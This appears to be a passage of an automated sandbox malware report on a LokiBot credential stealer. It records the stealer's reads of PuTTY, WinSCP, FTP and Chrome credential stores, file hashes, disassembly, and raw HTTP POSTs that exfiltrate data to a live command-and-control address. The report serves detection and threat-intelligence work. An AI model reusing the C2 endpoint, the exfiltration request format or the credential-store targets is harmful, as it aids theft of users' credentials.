      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 31 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 11 | Virtualization/Sandbox Evasion 211 | Credentials in Registry 1 | Virtualization/Sandbox Evasion 211 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation 1 | Security Account Manager | Application Window Discovery 1 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 115 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 6 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label | Link
      lzJWJgZhPc.exe | 39% | ReversingLabs | Win32.Backdoor.Androm |

      Dropped Files

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | 100% | Joe Sandbox ML | |

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label | Link
      http://63.250.34.171/tickets.php?id=277 | 100% | Avira URL Cloud | malware |

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.203.110 | true | false | | high
      googlehosted.l.googleusercontent.com | 142.250.180.161 | true | false | | high
      doc-00-50-docs.googleusercontent.com | unknown | unknown | false | | high

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://63.250.34.171/tickets.php?id=277 | true | Avira URL Cloud: malware | unknown

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nsis.sf.net/NSIS_ErrorError | lzJWJgZhPc.exe | false | | high
            https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf | Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | false | | high
            https://doc-00-50-docs.googleusercontent.com/ | Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp | false | | high

                  Contacted IPs

                  Public

                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  142.250.180.161 | googlehosted.l.googleusercontent.com | United States | | 15169 | GOOGLEUS | false
                  63.250.34.171 | unknown | United States | | 22612 | NAMECHEAP-NETUS | true
                  142.250.203.110 | drive.google.com | United States | | 15169 | GOOGLEUS | false

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:532379
                  Start date:02.12.2021
                  Start time:07:07:03
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:lzJWJgZhPc (renamed file extension from none to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@5/4@2/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 100% (good quality ratio 97.1%)
                  • Quality average: 84.4%
                  • Quality standard deviation: 23.8%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532379/sample/lzJWJgZhPc.exe

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  07:09:46 | API Interceptor | 1x Sleep call for process: Form_Sporogeni.exe modified

                  Joe Sandbox View / Context

                  IPs


                  Domains

                  No context

                  ASN


                  JA3 Fingerprints


                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Process:C:\Users\user\Desktop\lzJWJgZhPc.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):99196928
                  Entropy (8bit):0.9333217519599362
                  Encrypted:false
                  SSDEEP:1536:7p/zRrIP5kbuDX+eSBKsBYUDIAr0fBB8mPQlmYLx:7Prm4aXsBYUDIAraBBR48YLx
                  MD5:3C6FB2D5CB7A8CCF575C378C5883EAC2
                  SHA1:8896C5D3DCFB5F1BF938E22B8852B9B9CA40BB34
                  SHA-256:6E7322135275A9578CFCE25D31A5E50064176AD75C96986F11B68C5199756B32
                  SHA-512:1062CAF868D56E2A5406DF0E8112BBB1328E120CE2F98F270012FA692D5AE57FA6994DE62DE5B12D9138E5D97AED3FF4FC803932FBAE43720521714B4520CFB8
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)
                  Process:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):99196928
                  Entropy (8bit):0.9333217519599362
                  Encrypted:false
                  SSDEEP:
                  MD5:3C6FB2D5CB7A8CCF575C378C5883EAC2
                  SHA1:8896C5D3DCFB5F1BF938E22B8852B9B9CA40BB34
                  SHA-256:6E7322135275A9578CFCE25D31A5E50064176AD75C96986F11B68C5199756B32
                  SHA-512:1062CAF868D56E2A5406DF0E8112BBB1328E120CE2F98F270012FA692D5AE57FA6994DE62DE5B12D9138E5D97AED3FF4FC803932FBAE43720521714B4520CFB8
                  Malicious:false
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L....x.P..........................................@.........................................................................d...(.......`................................................................... ... .......<............................text...X........................... ..`.data...L...........................@....rsrc...`...........................@..@..V............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  File Type:data
                  Category:modified
                  Size (bytes):46
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:D898504A722BFF1524134C6AB6A5EAA5
                  SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                  SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                  SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ..............................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):4.768333100076337
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:lzJWJgZhPc.exe
                  File size:191165
                  MD5:46984f492d6314442d1a502d7ab460c4
                  SHA1:3515b9159efe0abc0df68d352c4e1bed4391c2fe
                  SHA256:4366a0e113d168f2809a4a1983c2198ec874b89af0bdfe465e753d409c85c51c
                  SHA512:e87563c2ac5464e9bd1786288dadadfa75ab843d2c02801ad6fb7e05194483fffc79580dc046a8bc313bd78d008758722f590ed6762b3b5f3603268a6b73d02c
                  SSDEEP:1536:g/T2X/jN2vxZz0DTHUpou4ubBITyPjcBuwXDxbZpv9u3o7c1As3eDQYdU:gbG7N2kDTHUpou4ubKpxbZbL+V3tZ
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x40352d
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A2E0h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080CCh]
                  mov esi, dword ptr [004080D0h]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007FB630C0268Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007FB630C0265Ah
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [00434FB8h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4c000 | 0x11e0 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata | 0x36000 | 0x16000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc | 0x4c000 | 0x11e0 | 0x1200 | False | 0.368489583333 | data | 4.48173978815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_BITMAP | 0x4c268 | 0x368 | data | English | United States
                  RT_ICON | 0x4c5d0 | 0x2e8 | data | English | United States
                  RT_DIALOG | 0x4c8b8 | 0x144 | data | English | United States
                  RT_DIALOG | 0x4ca00 | 0x13c | data | English | United States
                  RT_DIALOG | 0x4cb40 | 0x100 | data | English | United States
                  RT_DIALOG | 0x4cc40 | 0x11c | data | English | United States
                  RT_DIALOG | 0x4cd60 | 0xc4 | data | English | United States
                  RT_DIALOG | 0x4ce28 | 0x60 | data | English | United States
                  RT_GROUP_ICON | 0x4ce88 | 0x14 | data | English | United States
                  RT_MANIFEST | 0x4cea0 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                  Imports

                  DLL | Import
                  ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                  Possible Origin

                  Language of compilation system | Country where language is spoken | Map
                  English | United States |

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  12/02/21-07:09:39.896500 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49761 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:39.896500 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:39.896500 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:39.896500 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49761 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:40.850955 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49761 | 63.250.34.171 | 192.168.2.3
                  12/02/21-07:09:43.464229 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49762 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:43.464229 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49762 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:43.464229 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49762 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:43.464229 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49762 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:44.496278 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49762 | 63.250.34.171 | 192.168.2.3
                  12/02/21-07:09:46.686868 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49773 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:46.686868 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49773 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:46.686868 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49773 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:46.686868 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49773 | 80 | 192.168.2.3 | 63.250.34.171
                  12/02/21-07:09:47.621853 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49773 | 63.250.34.171 | 192.168.2.3

                  Network Port Distribution

                  TCP Packets


                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Dec 2, 2021 07:09:36.455410004 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
                  Dec 2, 2021 07:09:36.481583118 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
                  Dec 2, 2021 07:09:37.461218119 CET | 55102 | 53 | 192.168.2.3 | 8.8.8.8
                  Dec 2, 2021 07:09:37.489072084 CET | 53 | 55102 | 8.8.8.8 | 192.168.2.3

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Dec 2, 2021 07:09:36.455410004 CET | 192.168.2.3 | 8.8.8.8 | 0xa724 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
                  Dec 2, 2021 07:09:37.461218119 CET | 192.168.2.3 | 8.8.8.8 | 0x9173 | Standard query (0) | doc-00-50-docs.googleusercontent.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Dec 2, 2021 07:09:36.481583118 CET | 8.8.8.8 | 192.168.2.3 | 0xa724 | No error (0) | drive.google.com | | 142.250.203.110 | A (IP address) | IN (0x0001)
                  Dec 2, 2021 07:09:37.489072084 CET | 8.8.8.8 | 192.168.2.3 | 0x9173 | No error (0) | doc-00-50-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
                  Dec 2, 2021 07:09:37.489072084 CET | 8.8.8.8 | 192.168.2.3 | 0x9173 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.180.161 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • drive.google.com
                  • doc-00-50-docs.googleusercontent.com
                  • 63.250.34.171

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49758 | 142.250.203.110 | 443 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49760 | 142.250.180.161 | 443 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.3 | 49761 | 63.250.34.171 | 80 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 2, 2021 07:09:39.896500111 CET | 11587 | OUT | POST /tickets.php?id=277 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 63.250.34.171
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: AA495C78
                  Content-Length: 190
                  Connection: close
                  Dec 2, 2021 07:09:40.850955009 CET | 11588 | IN | HTTP/1.1 403 Forbidden
                  Date: Thu, 02 Dec 2021 06:09:39 GMT
                  Server: Apache/2.4.38 (Debian)
                  Content-Length: 287
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.3 | 49762 | 63.250.34.171 | 80 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 2, 2021 07:09:43.464229107 CET | 11589 | OUT | POST /tickets.php?id=277 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 63.250.34.171
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: AA495C78
                  Content-Length: 190
                  Connection: close
                  Dec 2, 2021 07:09:44.496278048 CET | 11594 | IN | HTTP/1.1 403 Forbidden
                  Date: Thu, 02 Dec 2021 06:09:43 GMT
                  Server: Apache/2.4.38 (Debian)
                  Content-Length: 287
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.3 | 49773 | 63.250.34.171 | 80 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 2, 2021 07:09:46.686867952 CET | 11615 | OUT | POST /tickets.php?id=277 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 63.250.34.171
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: AA495C78
                  Content-Length: 163
                  Connection: close
                  Dec 2, 2021 07:09:47.621853113 CET | 11625 | IN | HTTP/1.1 403 Forbidden
                  Date: Thu, 02 Dec 2021 06:09:46 GMT
                  Server: Apache/2.4.38 (Debian)
                  Content-Length: 287
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
